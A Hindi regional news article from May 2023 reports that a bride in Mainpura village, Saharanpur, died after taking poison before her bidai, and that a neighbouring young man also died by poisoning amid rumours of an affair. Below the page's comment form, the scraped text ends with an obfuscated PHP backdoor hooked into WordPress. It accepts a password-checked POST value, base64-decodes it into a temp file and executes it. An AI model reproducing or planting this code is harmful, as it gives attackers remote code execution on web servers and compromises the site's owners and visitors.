विदाई से पहले दूल्हन ने खाया जहर, खबर सुन पड़ोसी ने भी दी जान, परिजनों में मचा कोहराम…

Uttarakhand Press News, 22 May 2023: सहारनपुर स्थित कोतवाली गंगोह क्षेत्र के गांव मैनपुरा में विदाई से पहले एक युवती ने जहर खाकर आत्महत्या कर ली। इसी दौरान पड़ोसी युवक ने भी जहर खा लिया और थाने पहुंच गया। हालत गंभीर देखते हुए पुलिस ने उसे जिला अस्पताल में भर्ती कराया, जहां उसकी मौत हो गई। पुलिस ने शवों को पोस्टमार्टम के लिए भेजा। युवती की तीन वर्ष पूर्व शादी हुई थी और रविवार को उसकी विदाई होनी थी।

मैनपुरा निवासी आयशा (25) का निकाह तीन वर्ष पूर्व नकुड़ कोतवाली क्षेत्र के गांव नवाजपुर निवासी युवक से हुआ था। उसकी विदाई नहीं हुई थी। रविवार को उसकी विदाई की तारीख तय थी। ससुराल पक्ष के लोग विदाई के लिए गांव आए थे। शादी में दिया गया सामान भी जा चुका था। इसी बीच विदाई से पहले ही युवती ने जहरीला पदार्थ खा लिया। इससे उसकी हालत बिगड गई। परिजन उसे इलाज के लिए एक निजी चिकित्सक के यहां ले गए, जहां उसकी मौत हो गई।
सूचना पर गांव पहुंची पुलिस ने शव का पंचनामा भरकर पोस्टमार्टम के लिए भेज दिया। उधर, इसी बीच युवती के पड़ोस में रहने वाले युवक मेहरदीन (26) ने भी जहर खा लिया और कोतवाली गंगोह पहुंच गया। पुलिस ने तुरंत उसे सीएचसी में भर्ती कराया। वहां से गंभीर अवस्था में उसे जिला अस्पताल रेफर कर दिया गया। जिला अस्पताल में युवक की भी मौत हो गई है। पुलिस ने दोनों शवों को पोस्टमार्टम के लिए भेजा है। एसपी देहात सागर जैन ने बताया कि शुरुआती जांच में सामने आया है कि दोनों जहर खाकर आत्महत्या की है। बाकी स्थिति का पोस्टमार्टम रिपोर्ट आने के बाद पता चलेगा।

प्रेम-प्रसंग होने की रही चर्चा:
एसपी देहात सागर जैन का कहना है कि दोनों ने आत्महत्या क्यों की है, इसकी वजह से स्पष्ट नहीं हो पाई है और न ही दोनों के परिजन कुछ बता पा रहे हैं। गांव में चर्चा रही कि दोनों के बीच प्रेम-प्रसंग चल रहा था, लेकिन अभी तक पुष्टि नहीं हो पाई है।

परिजनों में मचा कोहराम, ग्रामीण भी गमजदा:
युवक-युवती की मौत से दोनों के परिजनों में कोहराम मचा है। परिवार के सदस्यों का रो-रोककर बुराहाल हो गया, लेकिन दोनों के द्वारा आत्महत्या करने के कारण परिजन भी नहीं बता पाए। वहीं, मैनपुरा में एक साथ हुई दो मौत से ग्रामीण भी गमजदा हैं।

Read Previous

गुरुग्राम से नैनीताल घूमने आए पर्यटक की अचानक मौत, जाम के कारण समय से नहीं पहुंच सके अस्पताल

Read Next

बड़ा हादसा: बरात लेकर लौट रही बेकाबू बोलेरो पेड़ से टकराई, हादसे में चार की मौत, तीन घायल..

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}